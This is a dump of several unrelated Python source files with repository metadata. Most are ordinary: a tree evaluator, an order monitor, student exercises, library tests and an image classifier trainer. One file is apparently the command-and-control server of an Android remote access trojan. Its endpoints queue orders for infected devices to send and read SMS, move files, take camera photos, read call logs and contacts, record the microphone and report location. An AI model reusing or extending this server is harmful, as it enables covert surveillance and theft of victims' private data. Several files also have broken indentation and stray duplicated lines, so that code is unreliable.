            if tree[t][0] == '+' :
                stack.push(y+x)
            elif tree[t][0] == '-' :
                stack.push(y-x)
            elif tree[t][0] == '*' :
                stack.push(y*x)
            elif tree[t][0] == '/' :
                # Floor division -- inputs presumably divide evenly;
                # TODO confirm behavior for negative operands.
                stack.push(y//x)
stack.push(y//x)
# Driver: 10 fixed test cases; each gives N lines "id value [left right]".
for test_case in range(1,11) :
    N = int(input())
    tree = [ [0]*3 for _ in range(N+1) ]   # tree[i] = [value, left, right]
    for _ in range(N) :
        node = input().split()
        if len(node) == 2 :
            # Leaf node: numeric operand only.
            tree[int(node[0])][0] = int(node[1])
        else :
            # Internal node: operator plus child indices.
            tree[int(node[0])][0] = node[1]
            tree[int(node[0])][1] = int(node[2])
            tree[int(node[0])][2] = int(node[3])
    stack = Stack()
    # Evaluate from the root (node 1); the result is left on the stack.
    inorder(1)
    print('#{} {}'.format(test_case, stack.pop()))
"nayeong_e@naver.com"
] | nayeong_e@naver.com |
060b3c3a67634fc563621bc8ff9a56a6e126e163 | 2c0d223b8f630dfb9a6e90e5efd7785cb90379f4 | /DataMonitor/monitor/monitor_order_add.py | 1844dd10772cbd6a1b68e778edae178d4ff5ccae | [] | no_license | hegajun/Analysis | 31ead4e0cf2a2791351386be81888b7dd25b9cbb | e3f2334b3be0a600bf185469be6bd52af172f302 | refs/heads/master | 2020-03-13T19:03:30.480132 | 2013-05-29T03:16:13 | 2013-05-29T03:16:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
@author: zhoujiebing
@contact: zhoujiebing@maimiaotech.com
@date: 2012-08-25 16:18
@version: 0.0.0
@license: Copyright alibaba-inc.com
@copyright: Copyright alibaba-inc.com
"""
import re
import urllib2
import sys
if __name__ == '__main__':
sys.path.append('../../')
from DataMonitor.conf.settings import CACHE_DIR, ORDER_CHECK_SETTING
from CommonTools.ztc_order_tools import ZtcOrder
def get_record_order(id_name):
    # Read the last recorded order (nick, pay time, poll counter) for a
    # service from its cache file; format is one "nick,time,num" line.
    # NOTE(review): uses the Python 2 ``file()`` builtin -- this module is
    # Python 2 code (see the print statements below).
    file_date = file(CACHE_DIR+id_name+'_order').read().split('\n')
    order_type = file_date[0].split(',')
    if len(order_type) >= 3:
        return (order_type[0], order_type[1], int(order_type[2]))
    else:
        # Malformed/empty cache: placeholder record with counter 3 so the
        # caller performs a full check on the next poll.
        return ('nick','time', 3)
def write_record_order(id_name, nick, time, num):
    # Persist the newest seen order (nick, time) and the poll counter.
    file_obj = file(CACHE_DIR+id_name+'_order', 'w')
    file_obj.write('%s,%s,%d\n' % (nick, time, num))
    file_obj.close()
def monitor_order_add(id_name='省油宝', id='ts-1796606'):
    """Count orders newer than the last recorded one and return a warning
    string when the count is below the alarm threshold ('' otherwise).

    Only every 4th call actually compares against the record -- ``num``
    counts the skipped polls. Presumably this spaces real checks ~30
    minutes apart; TODO confirm against the scheduler interval.
    """
    return_info = ''
    order_list = get_first_page_order(id)
    (old_nick, old_time, num) = get_record_order(id)
    if num >= 3:
        first_order = order_list[0]
        # Orders are newest-first; count entries until the recorded
        # (nick, payTime) pair is reached.
        add_order = 0
        for order in order_list:
            if old_nick == order['nick'] and old_time == order['payTime']:
                break
            add_order += 1
        num = 0
        if add_order < ORDER_CHECK_SETTING['ADD']:
            return_info = id_name+'30分钟内新增订单数为:%d, 低于警报界限:%d.\n' % (add_order, ORDER_CHECK_SETTING['ADD'])
            print 'add_order:',add_order
        # Remember the newest order and reset the poll counter.
        write_record_order(id, first_order['nick'], first_order['payTime'], 0)
    else:
        # Skip this poll; just bump the counter.
        num += 1
        write_record_order(id, old_nick, old_time, num)
    return return_info
def getWebPage(url):
    """Fetch ``url`` and return the raw response body.

    Fixed resource leak: the original never closed the urlopen handle.
    """
    wp = urllib2.urlopen(url)
    try:
        content = wp.read()
    finally:
        wp.close()
    return content
def getUrl(id, day):
    """Build the Taobao subscription-list URL for service ``id``,
    page ``day`` (both strings).

    Fixed: the original literal contained the mojibake "¤tPage=" --
    the HTML entity ``&curren;`` had swallowed the ``&curren`` prefix of
    the ``&currentPage`` query parameter; restored here.
    """
    url = ('http://fuwu.taobao.com/serv/rencSubscList.do?serviceCode=' + id
           + '&currentPage=' + day + '&pageCount=' + day)
    return url
def get_first_page_order(id):
    # Fetch page 1 of the subscription list and return its order dicts.
    # The response's second line is an evaluable order payload.
    # NOTE(review): the loop runs exactly once (range(1,2)) and returns on
    # the first iteration -- kept as-is.
    for day in range(1,2):
        url = getUrl(id, str(day))
        content = getWebPage(url).split('\n')
        order_dict = ZtcOrder.eval_ztc_order(content[1])
        order_list = order_dict['data']
        return order_list
return order_list
if __name__ == '__main__':
print 'monitor_order_add:', monitor_order_add()
| [
"zhoujiebing@maimiaotech.com"
] | zhoujiebing@maimiaotech.com |
b81ad17a0e498eb428d635565a32212e699fc4a2 | 70150fa79dcc0f92140f4144f0997fc43ff50bff | /lab_02_01.py | 07134ec74a577d0e60e8871bd2973e3e5b911b18 | [] | no_license | Captain-on-time/Info-Lab-5 | 2417905d6a69309dd27a49d6fa2d247165016597 | 63bff1a396f1682b5119f9c368e3a69a0dadba46 | refs/heads/main | 2023-02-23T21:23:41.062024 | 2021-01-24T15:24:30 | 2021-01-24T15:24:30 | 332,482,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | num = int(input("How many times have you been to the Hermitage? "))
if num > 0:
print("Wonderful!")
print("I hope you liked this museum!")
else:
print("You should definitely visit the Hermitage!")
course = int(input("What is your course number? "))
if course == 1:
print("You are just at the beginning!")
elif course == 2:
print("You learned many things, but not all of them!")
elif course == 3:
print("The basic course is over, it's time for professional disciplines!")
else:
print("Oh! You need to hurry! June is the month of thesis defense")
x = 5
y = 12
if y % x > 0 :
print("%d cannot be evenly divided by %d" % (y,x))
z = 3
x = "{} is a divider of {}".format(z,y) if y%z==0 else "{} is not a divider of {}".format(z,y)
print(x)
print("\n\n")
p = 18;
if p > 10:
print(p)
print(p) if p > 10 else ""
a = 157
b = 525
if a > b:
print(a%b)
elif a < b:
print(b%a)
else:
print(a*b) | [
"noreply@github.com"
] | Captain-on-time.noreply@github.com |
3467fc55a3481e62825fbe2bdf75fd363c82e265 | d05a59feee839a4af352b7ed2fd6cf10a288a3cb | /xlsxwriter/test/comparison/test_textbox37.py | fcee2dcd1cb25fb93119b273ee97058e41f7bafb | [
"BSD-2-Clause-Views"
] | permissive | elessarelfstone/XlsxWriter | 0d958afd593643f990373bd4d8a32bafc0966534 | bb7b7881c7a93c89d6eaac25f12dda08d58d3046 | refs/heads/master | 2020-09-24T06:17:20.840848 | 2019-11-24T23:43:01 | 2019-11-24T23:43:01 | 225,685,272 | 1 | 0 | NOASSERTION | 2019-12-03T18:09:06 | 2019-12-03T18:09:05 | null | UTF-8 | Python | false | false | 915 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2019, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """
    Test file created by XlsxWriter against a file created by Excel.
    """
    def setUp(self):
        # Reference workbook the generated file is compared against.
        self.set_filename('textbox37.xlsx')
    def test_create_file(self):
        """Test the creation of a simple XlsxWriter file with textbox(s)."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()
        # Textbox carrying a hyperlink with a custom tooltip.
        worksheet.insert_textbox('E9', 'This is some text',
                                 {'url': 'https://github.com/jmcnamara',
                                  'tip': 'GitHub'})
        workbook.close()
        self.assertExcelEqual()
| [
"jmcnamara@cpan.org"
] | jmcnamara@cpan.org |
02766d5ac9580d59e5ffe2d11f5af33f79f0e98c | db06c6cd07abba0d26c6e6c516ef3e5469e3fb68 | /python_project/__init__.py | 8c0560713310934ff7ab4b1e02a67c22df2fce9b | [
"MIT"
] | permissive | wasimusu/python_project | 77bba8333171de967768d17a47f45a698c933f7f | e2aab3998c2285eda8afe8f5dbb839cbcccd81ea | refs/heads/master | 2023-08-14T10:26:59.086216 | 2021-09-22T19:25:25 | 2021-09-22T19:25:25 | 295,631,767 | 6 | 5 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from .mathlib import add
from .strlib import split
from .combo import split_string_add_nums | [
"noreply@github.com"
] | wasimusu.noreply@github.com |
e340276963306dd0e9d27bdadb64734baea458b3 | 305db68aa8055792e0881a8d3c085ffc6830ffe1 | /cooldent/apps/params/admin.py | 8e58b0662c6863774e3a223f9c2ca8c1b24d7965 | [
"BSD-3-Clause"
] | permissive | cpaja/dentalcool | 9feaf7f9a39412469032666024715e886b98dd60 | 0d97a0b5c4897619ee0b224abed22880a9cc34f6 | refs/heads/master | 2020-03-21T19:42:01.578358 | 2018-06-28T05:36:29 | 2018-06-28T05:36:29 | 138,964,848 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | # _*_ coding: utf-8 _*_
from django.contrib import admin
from django import forms
from django.utils.translation import ugettext_lazy as _
# models
from .models import Person
class PersonAdmin(admin.ModelAdmin):
search_fields = ('first_name', 'last_name',)
list_display = (
'first_name', 'last_name', 'identity_type', 'identity_num',)
admin.site.register(Person, PersonAdmin)
| [
"cesi.pacori@gmail.com"
] | cesi.pacori@gmail.com |
b2b5944e6faeb3d7ad3b5608f6728c36696eee3d | f204c8fa2530f685bf7499d4bf23b019baf4055c | /CoBat-Server/user-facing-command-center.py | 0f8d8cf61e29e04d9fd90a7802de9eba986a65c1 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | Phuong39/CoBat-RAT-Malware | db4310ff46ac85780988d0572669c508b609e8c7 | a32a6e46ab3a0d81c0ba3c854c9b7ae1fd4fc5df | refs/heads/master | 2023-08-29T20:09:50.753213 | 2021-09-05T16:57:24 | 2021-09-05T16:57:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,172 | py | from flask import Flask
from flask import request
from functools import wraps
import psycopg2
import uuid
import json
app = Flask(__name__)
conn = psycopg2.connect("host=127.0.0.1 port=5432 dbname=db user=user password=pwd")
sfalse = json.dumps({"success": False})
@app.errorhandler(404)
def handle404(error):
html = "<center>"
html += "<br><br><br>"
html += '<iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/dQw4w9WgXcQ?controls=0&autoplay=1" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>'
html += "<br>"
html += "nothing to do here :p"
html += "</center>"
return html
def general_validation(f):
@wraps(f)
def wrapped(*args, **kwargs):
if request.method == "POST":
if "deploy_id" not in request.form:
return sfalse
if request.method == "GET":
if "deploy_id" not in request.args:
return sfalse
return f(*args, **kwargs)
return wrapped
@app.route('/sms/send', methods=['POST'])
@general_validation
def sms_send():
form = request.form
if "target" in form and "payload" in form and "deploy_id" in form:
deploy_at = form["deploy_id"]
target = form["target"]
payload = form["payload"]
cur = conn.cursor()
# generate command_id
command_id = str(uuid.uuid4())
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, %s, '{}', '')",
(command_id, deploy_at, 'send-sms', target, payload))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/sms/get')
def sms_get():
query = request.args
if "deploy_id" in query:
deploy_at = query["deploy_id"]
cur = conn.cursor()
# generate command_id
command_id = str(uuid.uuid4())
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'get-sms'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/file/upload', methods=['POST'])
@general_validation
def file_upload():
if 'file' not in request.files:
return sfalse
form = request.form
file = request.files['file']
if file.filename == '':
return sfalse
if "path" in form:
deploy_at = form["deploy_id"]
save_at = form["path"]
# generate command_id
command_id = str(uuid.uuid4())
ext = file.filename.split(".")[-1]
file.save("./" + command_id + "." + ext)
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, %s, '{}', '')",
(command_id, deploy_at, 'upload-file', save_at))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/file/download', methods=['POST'])
@general_validation
def file_download():
form = request.form
# path, recursive, description :
# if path is a single file, then malware must download that file
# to our server
# if path is a folder, download all files in the folder
# if path is a folder, and recursive option are enabled, that follow child path
# and download all the file
if "path" in form and "recursive" in form:
deploy_at = form["deploy_id"]
path = form["path"]
recursive = True if form["path"] == "true" else False
recursive_jsonb = json.dumps({"recursive": recursive})
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, '', %s, '')",
(command_id, deploy_at, 'download-file', path, recursive_jsonb))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route('/camera/take')
@general_validation
def camera_take():
query = request.args
if "index" in query and "deploy_id" in query:
deploy_at = query["deploy_id"]
camera = query["index"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, %s, '', '{}', '')",
(command_id, deploy_at, 'camera-take', camera))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route("/call/log")
@general_validation
def call_log():
query = request.args
if "deploy_id" in query:
deploy_at = query["deploy_id"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'call-log'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route("/contact/save")
@general_validation
def contact_save():
form = request.form
if "name" in form and "phone" in form:
deploy_at = form["deploy_id"]
name = form["name"]
phone = form["phone"]
contact_jsonb = json.dumps({"name": name, "phone": phone})
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', %s, '')",
(command_id, deploy_at, 'contact-save', contact_jsonb))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
return sfalse
@app.route("/contact/get")
def contact_get():
deploy_at = request.args["deploy_id"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'contact-get'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
@app.route("/mic/record")
def mic_record():
deploy_at = request.args["deploy_id"]
record_time = 5
if "record_time" in request.args and request.args["record_time"].isdigit():
record_time = int(request.args["record_time"])
record_jsonb = json.dumps({"record_time": record_time})
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', %s, '')",
(command_id, deploy_at, 'mic-record', record_jsonb))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
@app.route("/location/get")
def location_get():
deploy_at = request.args["deploy_id"]
# generate command_id
command_id = str(uuid.uuid4())
# open cursor
cur = conn.cursor()
# command_id,deploy_id,command_type,start_at,finish_at,target,payload,args,command_raw
cur.execute("insert into command_center values (%s, %s, %s, 0, 0, '', '', '{}', '')",
(command_id, deploy_at, 'location-get'))
# commit - save persistent
conn.commit()
# close cursor
cur.close()
return json.dumps({"command_id": command_id, "success": True})
app.run(host="127.0.0.1", port=3000)
| [
"14269809+codenoid@users.noreply.github.com"
] | 14269809+codenoid@users.noreply.github.com |
b2baa6f16704f2315f831411ea57b852cf9a0b28 | 7322ec6b3352f8cca60bdfef49f8565d7667e478 | /OSI.py | 739fdd32a5bfa78e35d205d15fcb382531674b09 | [] | no_license | jayzoww/OSIModel | 21580baad4f71bc0d1c5636be0a038ad5a8881f9 | 401e91e50a34f23413259c3761cdc718ea30ff29 | refs/heads/master | 2021-01-20T03:21:17.051192 | 2017-04-26T23:24:18 | 2017-04-26T23:24:18 | 89,520,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,171 | py | from collections import OrderedDict
import binascii
import re
class OSIModel:
def __init__(self):
pass
def applicationLayer(self):
data = "message"
size = len(data)
print 'App Layer data:', data
print 'size:', size
print ' '
return data, size
def presentationLayer(self, message, size):
data=[]
temp=[]
#converts each character in message to integer representation of ASCII. This can be adapted to fit other encoding formats
for character in message:
data.append(ord(character))
#convert back to original ASCII Chars. This is purely to demonstrate that translation can occur between different syntax's/encodings
# for i in xrange(0, len(data)):
# data[i] = chr(data[i])
#Given MIME example header
data[:0] = '%'
header = 'MIME-version: 1.0'
for x in header:
temp.append(ord(x))
# print temp
data[:0] = temp
size = len(data)
print 'Presentation data:', data
print 'size:', size
return data, size
def sessionLayer(self, message, size):
data=message
temp=[]
header = 'SessionHeader'
for x in header:
temp.append(ord(x))
#attach header to beginning of message
data[:0] = temp
size = len(data)
print 'Session data:', data
print 'size:', size
return data, size
def transportLayer(self, message, size):
data = message
#following dictionary stores TCP protocol params
dict = OrderedDict([
('destPort',self.intToBin(25, 16)),
('sourcePort',self.intToBin(25, 16)),
('sequence',self.intToBin(2399401, 32)),
('ackNumber',self.intToBin(136622, 32)),
('dataOffset',self.intToBin(4, 4)),
('reserved',self.intToBin(0, 3)),
('NS', self.intToBin(0, 1)),
('URG',self.intToBin(0, 1)),
('ACK',self.intToBin(1, 1)),
('PSH',self.intToBin(1, 1)),
('RST',self.intToBin(0, 1)),
('SYN',self.intToBin(0, 1)),
('FIN',self.intToBin(1, 1)),
('window',self.intToBin(8, 16)),
('checkSum',self.intToBin(128, 16)),
('urgPointer',self.intToBin(0, 1))
])
#print dict.values()
data[:0] = list(dict.values())
size = len(data)
print 'Transport data:', data
print 'size:', size
return data, size
def networkLayer(self, message, size):
data = message
IPaddress = "192.168.1.100"
IP = map(int, IPaddress.split('.'))
#print IP
dict = OrderedDict([
('ip0', self.intToBin(IP[0], 8)),
('ip1', self.intToBin(IP[1], 8)),
('ip2', self.intToBin(IP[2], 8)),
('ip3', self.intToBin(IP[3], 8)),
])
data[:0] = list(dict.values())
size = len(data)
print 'Transport data:', data
print 'size:', size
return data, size
def dataLinkLayer(self, message, size):
data = message
temp = []
sourceAddr = '01:FF:3C:E4:22:8A'
destAddr = '9A:FC:32:54:A8:3E'
_type = '00'
#remove : from mac address
sourceAddr = re.sub(':', '', sourceAddr)
destAddr = re.sub(':', '', destAddr)
#convert hex to ascii
sourceAscii = binascii.unhexlify(sourceAddr)
destAscii = binascii.unhexlify(destAddr)
typeAscii = binascii.unhexlify(_type)
#convert ascii to int representation, store in temp list
for x in sourceAscii:
temp.append(ord(x))
for y in destAscii:
temp.append(ord(y))
for z in typeAscii:
temp.append(ord(z))
data [:0] = temp
size = len(data)
print 'DataLink data:', data
print 'size:', size
return data, size
def physicalLayer(self, message, size):
data = message
for i in xrange(0, len(data)):
if type(data[i]) is int:
data[i] = self.intToBin(data[i], 8)
transmitted = ''.join(data)
print 'Transmitted Bits:', transmitted
print 'size:', size*8
return transmitted
def intToBin(self, value, bits):
#This class converts integer to binary, pads leading 0's to obtain correct length
number = value
size = bits
binary = bin(number)[2:]
padded = binary.zfill(size)
return padded
if __name__ == '__main__':
OSI = OSIModel()
foo = '00'
data, size = OSI.applicationLayer()
data, size = OSI.presentationLayer(data, size)
data, size = OSI.sessionLayer(data, size)
data, size = OSI.transportLayer(data, size)
data, size = OSI.networkLayer(data, size)
data, size = OSI.dataLinkLayer(data, size)
global transmittedbits
transmittedbits = OSI.physicalLayer(data, size)
| [
"jayzhao94@gmail.com"
] | jayzhao94@gmail.com |
bbd4c06da73ee72b6d850c6aa7f9624284ed2171 | fb594bf2cd33157a1d1d486e25c8014d6463fe9b | /project-2/object-recognition/train_image_classifier.py | 01542da6a3a4218c12989d730954c6ae41628433 | [] | no_license | ShirleyHan6/CZ4042-Assignments | 6469d2977b07302c5496eb9f83b360e6e5f06500 | 915b2e53008575741627333103bafbef1a91d600 | refs/heads/master | 2020-08-14T00:01:36.843411 | 2019-11-16T05:57:25 | 2019-11-16T05:57:25 | 215,060,266 | 0 | 2 | null | 2019-11-16T05:57:27 | 2019-10-14T14:05:58 | Python | UTF-8 | Python | false | false | 3,659 | py | """
Train image classifier given model configuration. The trained model and statistic result are saved in
output/image-classifier-{datetime}.pth and output/image-classifier-stat-{datetime}.pkl respectively.
The statistic result can be plotted by function helper.plot_train_and_test.
"""
import argparse
import numpy as np
import torch
import tqdm
from datetime import datetime
from torch import nn
from torch import optim
from torch.optim.rmsprop import RMSprop
from configs import OUTPUT_DIR, parse_config
from helper.training import train, test, load_cifar_dataset
from models.classifier import CIFARClassifier
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--epoch', type=int, default=800, help='epoch number for training')
parser.add_argument('--bs', type=int, default=128, help='batch size for training and testing')
parser.add_argument('--lr', type=float, default=1e-3, help='learning rate')
parser.add_argument('--momentum', type=float, default=0, help='momentum')
parser.add_argument('--optimizer', type=str, default='sgd', help='optimizer for training')
parser.add_argument('--output', type=str, default='', help='output name of model and statistic result')
parser.add_argument('config', type=str, help='model configuration yaml path')
return parser.parse_args()
def train_image_classifier(args):
lr = args.lr
epochs = args.epoch
bs = args.bs
# prepare data
train_loader, test_loader = load_cifar_dataset(batch_size=bs)
# model
print('Using configuration: {}'.format(args.config))
config = parse_config(args.config)
net = CIFARClassifier(config).cuda()
# optimizer
if args.optimizer == 'sgd':
optimizer = optim.SGD(net.parameters(), lr=lr)
elif args.optimizer == 'momentum':
optimizer = optim.SGD(net.parameters(), lr=lr, momentum=args.momentum)
elif args.optimizer == 'rmsprop':
optimizer = RMSprop(net.parameters(), lr=lr)
elif args.optimizer == 'adam':
optimizer = optim.Adam(net.parameters(), lr=lr)
else:
raise ValueError('optimizer name not correct')
# loss
loss = nn.CrossEntropyLoss()
# statistics
train_losses = np.zeros(epochs, dtype=np.float)
train_accs = np.zeros(epochs, dtype=np.float)
test_losses = np.zeros(epochs, dtype=np.float)
test_accs = np.zeros(epochs, dtype=np.float)
best_test_loss = float('inf')
# misc
name_seed = datetime.now().strftime('%m%d-%H%M%S')
t = tqdm.trange(epochs)
for epoch in t:
train_loss, train_acc = train(net, data_loader=train_loader, optimizer=optimizer, criterion=loss)
test_loss, test_acc = test(net, data_loader=test_loader, criterion=loss)
# process statistics
train_losses[epoch], train_accs[epoch] = train_loss, train_acc
test_losses[epoch], test_accs[epoch] = test_loss, test_acc
t.set_description('[epoch {:d}] train loss {:g} | acc {:g} || val loss {:g} | acc {:g}'
.format(epoch, train_loss, train_acc, test_loss, test_acc))
# save model
if test_loss < best_test_loss:
best_test_loss = test_loss
torch.save(net.state_dict(), OUTPUT_DIR / '{}-{:s}.pth'.format(args.output, name_seed))
training_info = {'batch_size': bs, 'epoch': epochs, 'lr': lr,
'name_seed': name_seed}
stat = {'train_loss': train_losses, 'train_acc': train_accs, 'test_loss': test_losses, 'test_acc': test_accs}
content = {'info': training_info, 'stat': stat}
return content
if __name__ == '__main__':
train_image_classifier(parse_args())
| [
"YLI056@e.ntu.edu.sg"
] | YLI056@e.ntu.edu.sg |
b2bbffbbb7d3256b4c3e67c00a644e6cd2cc97bf | ca66a4283c5137f835377c3ed9a37128fcaed037 | /Lib/site-packages/sklearn/metrics/cluster/tests/test_supervised.py | 9eccf9696f7b88ea5a09c76d8b784abf3a66d5d4 | [] | no_license | NamithaKonda09/majorProject | f377f7a77d40939a659a3e59f5f1b771d88889ad | 4eff4ff18fa828c6278b00244ff2e66522e0cd51 | refs/heads/master | 2023-06-04T20:25:38.450271 | 2021-06-24T19:03:46 | 2021-06-24T19:03:46 | 370,240,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,620 | py | import numpy as np
from sklearn.metrics.cluster import adjusted_mutual_info_score
from sklearn.metrics.cluster import adjusted_rand_score
from sklearn.metrics.cluster import completeness_score
from sklearn.metrics.cluster import contingency_matrix
from sklearn.metrics.cluster import entropy
from sklearn.metrics.cluster import expected_mutual_information
from sklearn.metrics.cluster import fowlkes_mallows_score
from sklearn.metrics.cluster import homogeneity_completeness_v_measure
from sklearn.metrics.cluster import homogeneity_score
from sklearn.metrics.cluster import mutual_info_score
from sklearn.metrics.cluster import normalized_mutual_info_score
from sklearn.metrics.cluster import v_measure_score
from sklearn.metrics.cluster.supervised import _generalized_average
from sklearn.utils import assert_all_finite
from sklearn.utils.testing import (
assert_equal, assert_almost_equal, assert_raise_message,
assert_warns_message, ignore_warnings
)
from numpy.testing import assert_array_almost_equal
score_funcs = [
adjusted_rand_score,
homogeneity_score,
completeness_score,
v_measure_score,
adjusted_mutual_info_score,
normalized_mutual_info_score,
]
def test_future_warning():
score_funcs_with_changing_means = [
normalized_mutual_info_score,
adjusted_mutual_info_score,
]
warning_msg = "The behavior of "
args = [0, 0, 0], [0, 0, 0]
for score_func in score_funcs_with_changing_means:
assert_warns_message(FutureWarning, warning_msg, score_func, *args)
@ignore_warnings(category=FutureWarning)
def test_error_messages_on_wrong_input():
for score_func in score_funcs:
expected = ('labels_true and labels_pred must have same size,'
' got 2 and 3')
assert_raise_message(ValueError, expected, score_func,
[0, 1], [1, 1, 1])
expected = "labels_true must be 1D: shape is (2"
assert_raise_message(ValueError, expected, score_func,
[[0, 1], [1, 0]], [1, 1, 1])
expected = "labels_pred must be 1D: shape is (2"
assert_raise_message(ValueError, expected, score_func,
[0, 1, 0], [[1, 1], [0, 0]])
def test_generalized_average():
a, b = 1, 2
methods = ["min", "geometric", "arithmetic", "max"]
means = [_generalized_average(a, b, method) for method in methods]
assert means[0] <= means[1] <= means[2] <= means[3]
c, d = 12, 12
means = [_generalized_average(c, d, method) for method in methods]
assert means[0] == means[1] == means[2] == means[3]
@ignore_warnings(category=FutureWarning)
def test_perfect_matches():
for score_func in score_funcs:
assert_equal(score_func([], []), 1.0)
assert_equal(score_func([0], [1]), 1.0)
assert_equal(score_func([0, 0, 0], [0, 0, 0]), 1.0)
assert_equal(score_func([0, 1, 0], [42, 7, 42]), 1.0)
assert_equal(score_func([0., 1., 0.], [42., 7., 42.]), 1.0)
assert_equal(score_func([0., 1., 2.], [42., 7., 2.]), 1.0)
assert_equal(score_func([0, 1, 2], [42, 7, 2]), 1.0)
score_funcs_with_changing_means = [
normalized_mutual_info_score,
adjusted_mutual_info_score,
]
means = {"min", "geometric", "arithmetic", "max"}
for score_func in score_funcs_with_changing_means:
for mean in means:
assert score_func([], [], mean) == 1.0
assert score_func([0], [1], mean) == 1.0
assert score_func([0, 0, 0], [0, 0, 0], mean) == 1.0
assert score_func([0, 1, 0], [42, 7, 42], mean) == 1.0
assert score_func([0., 1., 0.], [42., 7., 42.], mean) == 1.0
assert score_func([0., 1., 2.], [42., 7., 2.], mean) == 1.0
assert score_func([0, 1, 2], [42, 7, 2], mean) == 1.0
def test_homogeneous_but_not_complete_labeling():
# homogeneous but not complete clustering
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 2, 2])
assert_almost_equal(h, 1.00, 2)
assert_almost_equal(c, 0.69, 2)
assert_almost_equal(v, 0.81, 2)
def test_complete_but_not_homogeneous_labeling():
# complete but not homogeneous clustering
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 1, 1, 2, 2],
[0, 0, 1, 1, 1, 1])
assert_almost_equal(h, 0.58, 2)
assert_almost_equal(c, 1.00, 2)
assert_almost_equal(v, 0.73, 2)
def test_not_complete_and_not_homogeneous_labeling():
# neither complete nor homogeneous but not so bad either
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 1, 1, 1],
[0, 1, 0, 1, 2, 2])
assert_almost_equal(h, 0.67, 2)
assert_almost_equal(c, 0.42, 2)
assert_almost_equal(v, 0.52, 2)
def test_non_consecutive_labels():
# regression tests for labels with gaps
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 2, 2, 2],
[0, 1, 0, 1, 2, 2])
assert_almost_equal(h, 0.67, 2)
assert_almost_equal(c, 0.42, 2)
assert_almost_equal(v, 0.52, 2)
h, c, v = homogeneity_completeness_v_measure(
[0, 0, 0, 1, 1, 1],
[0, 4, 0, 4, 2, 2])
assert_almost_equal(h, 0.67, 2)
assert_almost_equal(c, 0.42, 2)
assert_almost_equal(v, 0.52, 2)
ari_1 = adjusted_rand_score([0, 0, 0, 1, 1, 1], [0, 1, 0, 1, 2, 2])
ari_2 = adjusted_rand_score([0, 0, 0, 1, 1, 1], [0, 4, 0, 4, 2, 2])
assert_almost_equal(ari_1, 0.24, 2)
assert_almost_equal(ari_2, 0.24, 2)
@ignore_warnings(category=FutureWarning)
def uniform_labelings_scores(score_func, n_samples, k_range, n_runs=10,
